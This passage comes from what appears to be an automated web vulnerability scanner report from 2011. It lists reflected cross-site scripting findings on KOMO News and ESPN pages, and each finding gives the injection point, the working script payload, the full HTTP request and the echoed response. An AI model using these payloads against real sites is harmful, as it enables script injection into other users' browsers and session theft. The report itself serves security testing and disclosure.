<link rel="alternate" type="application/rss+xml" title="KOMO News Updates" href="http://search.komonews.com/default.aspx?ct=r&type=20245,90000063&5871d"><script>alert(1)</script>471bc5d854b=1&ename=rsspage" />
...[SNIP]...

1.171. http://search.komonews.com/Microsoft [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.komonews.com
Path:   /Microsoft

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f1976"><script>alert(1)</script>295fe6a9b13 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Microsoft?f1976"><script>alert(1)</script>295fe6a9b13=1 HTTP/1.1
Host: search.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 23 Feb 2011 23:06:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
SS-InternalUrl: ct=r&type=20245,89000029&f1976%22%3e%3cscript%3ealert(1)%3c%2fscript%3e295fe6a9b13=1
SS-UserId: 00000000-0000-0000-0000-000000000000
SS-IsAnonymous: 1
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44873
Set-Cookie: .ASPXANONYMOUS=K5LHF0AKzAEkAAAAMDRjNTEwMDMtNzA3YS00NTcwLWJkYmMtZjlkYmZlMjBlYWUx3Uqln6MJkSOnnnoDhvzfEXifdtQ1; expires=Wed, 04-May-2011 09:46:08 GMT; path=/; HttpOnly
Set-Cookie: sess_nopops=0; domain=.search.komonews.com; expires=Thu, 23-Feb-2012 23:06:08 GMT; path=/
Set-Cookie: sess_new=1; domain=.search.komonews.com; expires=Thu, 23-Feb-2012 23:06:08 GMT; path=/
Set-Cookie: sess_ct=0; domain=.search.komonews.com; expires=Thu, 23-Feb-2012 23:06:08 GMT; path=/
Set-Cookie: sess_last=2/23/2011 3:06:08 PM; domain=.search.komonews.com; expires=Thu, 23-Feb-2012 23:06:08 GMT; path=/
Vary: Accept-Encoding
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
   <title>Microsoft News</title>
   <meta http-equiv="X-UA-Compatible" content="IE=7" /
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="KOMO News Updates" href="http://search.komonews.com/default.aspx?ct=r&type=20245,89000029&f1976"><script>alert(1)</script>295fe6a9b13=1&ename=rsspage" />
...[SNIP]...

1.172. http://search.komonews.com/National-Leaders/Barack-Obama [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.komonews.com
Path:   /National-Leaders/Barack-Obama

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload afb1f"><script>alert(1)</script>56cfaf9390e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /National-Leaders/Barack-Obama?afb1f"><script>alert(1)</script>56cfaf9390e=1 HTTP/1.1
Host: search.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 23 Feb 2011 23:06:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
SS-InternalUrl: ct=r&type=20230,50001140&afb1f%22%3e%3cscript%3ealert(1)%3c%2fscript%3e56cfaf9390e=1
SS-UserId: 00000000-0000-0000-0000-000000000000
SS-IsAnonymous: 1
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 53639
Set-Cookie: .ASPXANONYMOUS=96RrJkAKzAEkAAAAODVlY2RkYTgtM2Y5Mi00MmNjLThiYzEtZDY1NzQzYTk4ODg0CqP5RJJL7rmcVYFM8LPTMuEZ88A1; expires=Wed, 04-May-2011 09:46:32 GMT; path=/; HttpOnly
Set-Cookie: sess_nopops=0; domain=.search.komonews.com; expires=Thu, 23-Feb-2012 23:06:32 GMT; path=/
Set-Cookie: sess_new=1; domain=.search.komonews.com; expires=Thu, 23-Feb-2012 23:06:32 GMT; path=/
Set-Cookie: sess_ct=0; domain=.search.komonews.com; expires=Thu, 23-Feb-2012 23:06:32 GMT; path=/
Set-Cookie: sess_last=2/23/2011 3:06:32 PM; domain=.search.komonews.com; expires=Thu, 23-Feb-2012 23:06:32 GMT; path=/
Vary: Accept-Encoding
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
   <title>Barack Obama News</title>
   <meta http-equiv="X-UA-Compatible" content="IE=7
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="KOMO News Updates" href="http://search.komonews.com/default.aspx?ct=r&type=20230,50001140&afb1f"><script>alert(1)</script>56cfaf9390e=1&ename=rsspage" />
...[SNIP]...

1.173. http://search.komonews.com/Sports/Mariners [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.komonews.com
Path:   /Sports/Mariners

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd653"><script>alert(1)</script>52ad56ec133 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Sports/Mariners?bd653"><script>alert(1)</script>52ad56ec133=1 HTTP/1.1
Host: search.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 23 Feb 2011 23:06:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
SS-InternalUrl: ct=r&q=&=quot%3bMariners%2cquot%3b&type=20198,20249732&bd653%22%3e%3cscript%3ealert(1)%3c%2fscript%3e52ad56ec133=1
SS-UserId: 00000000-0000-0000-0000-000000000000
SS-IsAnonymous: 1
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 51176
Set-Cookie: .ASPXANONYMOUS=nCStKEAKzAEkAAAAMThmMTQwMzAtZDJjYS00NGU3LTgxMzMtMDRlY2JmY2MwYTFiA5OESjmJdTdf8b9aTWmeoyyk5RE1; expires=Wed, 04-May-2011 09:46:36 GMT; path=/; HttpOnly
Set-Cookie: sess_nopops=0; domain=.search.komonews.com; expires=Thu, 23-Feb-2012 23:06:36 GMT; path=/
Set-Cookie: sess_new=1; domain=.search.komonews.com; expires=Thu, 23-Feb-2012 23:06:36 GMT; path=/
Set-Cookie: sess_ct=0; domain=.search.komonews.com; expires=Thu, 23-Feb-2012 23:06:36 GMT; path=/
Set-Cookie: sess_last=2/23/2011 3:06:36 PM; domain=.search.komonews.com; expires=Thu, 23-Feb-2012 23:06:36 GMT; path=/
Vary: Accept-Encoding
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
   <title>Sports News</title>
   <meta http-equiv="X-UA-Compatible" content="IE=7" />
   
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="KOMO News Updates" href="http://search.komonews.com/default.aspx?ct=r&=quot%3bMariners%2cquot%3b&type=20198,20249732&bd653"><script>alert(1)</script>52ad56ec133=1&ename=rsspage" />
...[SNIP]...

1.174. http://search.komonews.com/Sports/Seahawks [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.komonews.com
Path:   /Sports/Seahawks

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed940"><script>alert(1)</script>af0d5982538 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Sports/Seahawks?ed940"><script>alert(1)</script>af0d5982538=1 HTTP/1.1
Host: search.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 23 Feb 2011 23:06:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
SS-InternalUrl: ct=r&q=&=quot%3bSeahawks%2cquot%3b&type=20198,20249732&ed940%22%3e%3cscript%3ealert(1)%3c%2fscript%3eaf0d5982538=1
SS-UserId: 00000000-0000-0000-0000-000000000000
SS-IsAnonymous: 1
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 51176
Set-Cookie: .ASPXANONYMOUS=irwmKUAKzAEkAAAAMGVhNGU4MDctYTUzOC00M2JmLTg0OGYtMTlkMWEyM2YzNzVhP97LsOtMhGepQwGK_6QVdWu3ce81; expires=Wed, 04-May-2011 09:46:37 GMT; path=/; HttpOnly
Set-Cookie: sess_nopops=0; domain=.search.komonews.com; expires=Thu, 23-Feb-2012 23:06:37 GMT; path=/
Set-Cookie: sess_new=1; domain=.search.komonews.com; expires=Thu, 23-Feb-2012 23:06:37 GMT; path=/
Set-Cookie: sess_ct=0; domain=.search.komonews.com; expires=Thu, 23-Feb-2012 23:06:37 GMT; path=/
Set-Cookie: sess_last=2/23/2011 3:06:37 PM; domain=.search.komonews.com; expires=Thu, 23-Feb-2012 23:06:37 GMT; path=/
Vary: Accept-Encoding
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
   <title>Sports News</title>
   <meta http-equiv="X-UA-Compatible" content="IE=7" />
   
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="KOMO News Updates" href="http://search.komonews.com/default.aspx?ct=r&=quot%3bSeahawks%2cquot%3b&type=20198,20249732&ed940"><script>alert(1)</script>af0d5982538=1&ename=rsspage" />
...[SNIP]...

1.175. http://search.komonews.com/Sports/Sounders [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.komonews.com
Path:   /Sports/Sounders

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52dca"><script>alert(1)</script>187c0480744 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Sports/Sounders?52dca"><script>alert(1)</script>187c0480744=1 HTTP/1.1
Host: search.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 23 Feb 2011 23:06:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
SS-InternalUrl: ct=r&q=%22Sounders%22&type=20198,20249732&52dca%22%3e%3cscript%3ealert(1)%3c%2fscript%3e187c0480744=1
SS-UserId: 00000000-0000-0000-0000-000000000000
SS-IsAnonymous: 1
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 48661
Set-Cookie: .ASPXANONYMOUS=tGPDKUAKzAEkAAAANzM0Mjg0ZWEtZTJkNS00NmE1LWIyY2QtNjJiOGEyNTc1NWUwSHq9SF8emDkTTAASAqfuVEITTFM1; expires=Wed, 04-May-2011 09:46:38 GMT; path=/; HttpOnly
Set-Cookie: sess_nopops=0; domain=.search.komonews.com; expires=Thu, 23-Feb-2012 23:06:38 GMT; path=/
Set-Cookie: sess_new=1; domain=.search.komonews.com; expires=Thu, 23-Feb-2012 23:06:38 GMT; path=/
Set-Cookie: sess_ct=0; domain=.search.komonews.com; expires=Thu, 23-Feb-2012 23:06:38 GMT; path=/
Set-Cookie: sess_last=2/23/2011 3:06:38 PM; domain=.search.komonews.com; expires=Thu, 23-Feb-2012 23:06:38 GMT; path=/
Vary: Accept-Encoding
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
   <title>Sports &quot;Sounders&quot; News</title>
   <meta http-equiv="X-UA-Compatible
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="KOMO News Updates" href="http://search.komonews.com/default.aspx?ct=r&q=%22Sounders%22&type=20198,20249732&52dca"><script>alert(1)</script>187c0480744=1&ename=rsspage" />
...[SNIP]...

1.176. http://search.komonews.com/default.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.komonews.com
Path:   /default.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 262ed"><script>alert(1)</script>6ed48e1f7ef was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /default.aspx?ct=r&q=alaskan+way+viaduct&262ed"><script>alert(1)</script>6ed48e1f7ef=1 HTTP/1.1
Host: search.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 23 Feb 2011 23:07:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
SS-InternalUrl: ct=r&q=alaskan+way+viaduct&262ed%22%3e%3cscript%3ealert(1)%3c%2fscript%3e6ed48e1f7ef=1
SS-UserId: 00000000-0000-0000-0000-000000000000
SS-IsAnonymous: 1
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 47701
Set-Cookie: .ASPXANONYMOUS=_IvWOUAKzAEkAAAAZmQyMjEzZTUtMmM2OS00MTE5LWJjZDctNDU1ZTI1ZTQ5OWUwH664_BbROqxQXMQjructrXLWTLI1; expires=Wed, 04-May-2011 09:47:05 GMT; path=/; HttpOnly
Set-Cookie: sess_nopops=0; domain=.search.komonews.com; expires=Thu, 23-Feb-2012 23:07:05 GMT; path=/
Set-Cookie: sess_new=1; domain=.search.komonews.com; expires=Thu, 23-Feb-2012 23:07:05 GMT; path=/
Set-Cookie: sess_ct=0; domain=.search.komonews.com; expires=Thu, 23-Feb-2012 23:07:05 GMT; path=/
Set-Cookie: sess_last=2/23/2011 3:07:05 PM; domain=.search.komonews.com; expires=Thu, 23-Feb-2012 23:07:05 GMT; path=/
Vary: Accept-Encoding
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
   <title>Alaskan Way Viaduct News</title>
   <meta http-equiv="X-UA-Compatible" conten
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="KOMO News Updates" href="http://search.komonews.com/default.aspx?ct=r&q=alaskan+way+viaduct&262ed"><script>alert(1)</script>6ed48e1f7ef=1&ename=rsspage" />
...[SNIP]...

1.177. http://search.komonews.com/default.aspx [q parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.komonews.com
Path:   /default.aspx

Issue detail

The value of the q request parameter is copied into the HTML document as plain text between tags. The payload 800ef<script>alert(1)</script>802ab134ff2 was submitted in the q parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /default.aspx?ct=r&q=alaskan+way+viaduct800ef<script>alert(1)</script>802ab134ff2 HTTP/1.1
Host: search.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Wed, 23 Feb 2011 23:06:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
SS-InternalUrl: ct=r&q=alaskan+way+viaduct+800+e%3cscript%3ealert(1)%3c%2fscript%3e802ab134ff2&cq=alaskan+way+viaduct800ef%3cscript%3ealert(1)%3c%2fscript%3e802ab134ff2
SS-UserId: 00000000-0000-0000-0000-000000000000
SS-IsAnonymous: 1
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 16006
Set-Cookie: .ASPXANONYMOUS=4KApLUAKzAEkAAAAZDE4MjJmMDQtMGFjNi00NDdjLWEwYzEtMzY3NGRhM2NkMGQyHZX1RYPJpm0WtbgAPpNgmu8k3vc1; expires=Wed, 04-May-2011 09:46:43 GMT; path=/; HttpOnly
Set-Cookie: sess_nopops=0; domain=.search.komonews.com; expires=Thu, 23-Feb-2012 23:06:43 GMT; path=/
Set-Cookie: sess_new=1; domain=.search.komonews.com; expires=Thu, 23-Feb-2012 23:06:43 GMT; path=/
Set-Cookie: sess_ct=0; domain=.search.komonews.com; expires=Thu, 23-Feb-2012 23:06:43 GMT; path=/
Set-Cookie: sess_last=2/23/2011 3:06:43 PM; domain=.search.komonews.com; expires=Thu, 23-Feb-2012 23:06:43 GMT; path=/
Vary: Accept-Encoding
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
   <title>&quot;alaskan way viaduct 800 e&lt;script&gt;alert 1 &lt; script&gt;802ab13
...[SNIP]...
<div class="noresults">No results found for &quot;alaskan way viaduct800ef<script>alert(1)</script>802ab134ff2&quot; or &quot;alaskan way viaduct 800 e&lt;script&gt;alert(1)&lt;/script&gt;802ab134ff2&quot;.</div>
...[SNIP]...

1.178. http://soccernet.espn.go.com/team [cc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://soccernet.espn.go.com
Path:   /team

Issue detail

The value of the cc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c0321"%3balert(1)//d2fdfaa962c was submitted in the cc parameter. This input was echoed as c0321";alert(1)//d2fdfaa962c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /team?id=190&cc=5901c0321"%3balert(1)//d2fdfaa962c HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 23 Feb 2011 23:06:47 GMT
Content-Type: text/html; charset=iso-8859-1
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN02
Set-Cookie: SWID=9C26EDED-89CF-48C8-B3F7-8885D279085F; path=/; expires=Wed, 23-Feb-2031 23:06:47 GMT; domain=.go.com;
Cache-Expires: Wed, 23 Feb 2011 23:11:47 GMT
Content-Length: 27184
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; expires=Sat, 05 Mar 2011 23:06:47 GMT; Path=/; Domain=.go.com
Connection: close
Via: 8810-05/06
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>New York Red Bulls
...[SNIP]...
ng()].join("")}}(function(){var c=false,e="AcceptCookies";if(document.cookie.indexOf(e)!==-1){c=true}else{cookieFunc(e,"yes",3);cookie=cookieFunc(e,null,null);if(cookie!=null){c=true}}if(c){var g="5901c0321";alert(1)//d2fdfaa962c",d=cookieFunc("COREG"),f=window.location,a="replace";if(g!=null){g=g+""}if(d!=null&&d!==g){setORef();if(location.toString().indexOf("cc=")!=-1){var b=new RegExp("cc="+g,"i");f=f.toString()[a](b,"cc="+
...[SNIP]...

1.179. http://soccernet.espn.go.com/team [cc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://soccernet.espn.go.com
Path:   /team

Issue detail

The value of the cc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 563e2"><script>alert(1)</script>a0867662a73 was submitted in the cc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /team?id=190&cc=5901563e2"><script>alert(1)</script>a0867662a73 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 23 Feb 2011 23:06:46 GMT
Content-Type: text/html; charset=iso-8859-1
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN32
Set-Cookie: SWID=0080C2D3-BF04-4C91-85A0-65F5A6E54CD3; path=/; expires=Wed, 23-Feb-2031 23:06:46 GMT; domain=.go.com;
Cache-Expires: Wed, 23 Feb 2011 23:11:46 GMT
Content-Length: 27281
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; expires=Sat, 05 Mar 2011 23:06:46 GMT; Path=/; Domain=.go.com
Connection: close
Via: 8810-05/06
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>New York Red Bulls
...[SNIP]...
ng()].join("")}}(function(){var c=false,e="AcceptCookies";if(document.cookie.indexOf(e)!==-1){c=true}else{cookieFunc(e,"yes",3);cookie=cookieFunc(e,null,null);if(cookie!=null){c=true}}if(c){var g="5901563e2"><script>alert(1)</script>a0867662a73",d=cookieFunc("COREG"),f=window.location,a="replace";if(g!=null){g=g+""}if(d!=null&&d!==g){setORef();if(location.toString().indexOf("cc=")!=-1){var b=new RegExp("cc="+g,"i");f=f.toString()[a](b,"cc="+
...[SNIP]...

1.180. http://sports.espn.go.com/chicago/nba/columns/story [columnist parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://sports.espn.go.com
Path:   /chicago/nba/columns/story

Issue detail

The value of the columnist request parameter is copied into an HTML comment. The payload de58b--><script>alert(1)</script>a255c6a6a00 was submitted in the columnist parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /chicago/nba/columns/story?columnist=greenberg_jonde58b--><script>alert(1)</script>a255c6a6a00&id=6146046 HTTP/1.1
Host: sports.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; s_pers=%20s_c24%3D1298497403866%7C1393105403866%3B%20s_c24_s%3DFirst%2520Visit%7C1298499203866%3B%20s_gpv_pn%3Despnnewyork%253Anewyork%253Ahome%253Aindex%7C1298499203874%3B; s_sess=%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B%20s_ppv%3D25%3B; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; s_vi=[CS]v1|26B2BFB9850139D0-4000010EA079E4CC[CE]; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1298497363; userAB=F; SWID=EEF93A7D-3488-4FA5-8C21-135C0F4819BF;

Response

HTTP/1.1 200 OK
Cache-Control: max-age=60
Date: Sat, 26 Feb 2011 02:21:50 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 26 Feb 2011 02:21:50 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN31
Cache-Expires: Sat, 26 Feb 2011 02:22:50 GMT
Content-Length: 48139
Connection: close
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Coaching Chicago Bu
...[SNIP]...
<!--url:/chicago/nba/columns/story?columnist=greenberg_jonde58b--><script>alert(1)</script>a255c6a6a00&id=6146046-->
...[SNIP]...

1.181. http://sports.espn.go.com/chicago/nfl/columns/story [columnist parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://sports.espn.go.com
Path:   /chicago/nfl/columns/story

Issue detail

The value of the columnist request parameter is copied into an HTML comment. The payload df167--><script>alert(1)</script>1c3289f1740 was submitted in the columnist parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /chicago/nfl/columns/story?columnist=isaacson_melissadf167--><script>alert(1)</script>1c3289f1740&id=6137245 HTTP/1.1
Host: sports.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; s_pers=%20s_c24%3D1298497403866%7C1393105403866%3B%20s_c24_s%3DFirst%2520Visit%7C1298499203866%3B%20s_gpv_pn%3Despnnewyork%253Anewyork%253Ahome%253Aindex%7C1298499203874%3B; s_sess=%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B%20s_ppv%3D25%3B; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; s_vi=[CS]v1|26B2BFB9850139D0-4000010EA079E4CC[CE]; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1298497363; userAB=F; SWID=EEF93A7D-3488-4FA5-8C21-135C0F4819BF;

Response

HTTP/1.1 200 OK
Cache-Control: max-age=60
Date: Sat, 26 Feb 2011 02:22:33 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 26 Feb 2011 02:22:33 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN15
Cache-Expires: Sat, 26 Feb 2011 02:23:33 GMT
Content-Length: 41569
Connection: close
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Dave Duerson's form
...[SNIP]...
<!--url:/chicago/nfl/columns/story?columnist=isaacson_melissadf167--><script>alert(1)</script>1c3289f1740&id=6137245-->
...[SNIP]...

1.182. http://sports.espn.go.com/chicago/teams/recap [sport parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://sports.espn.go.com
Path:   /chicago/teams/recap

Issue detail

The value of the sport request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf0f9"><script>alert(1)</script>e1494246220 was submitted in the sport parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /chicago/teams/recap?gameId=310542507&sport=ncbbf0f9"><script>alert(1)</script>e1494246220 HTTP/1.1
Host: sports.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
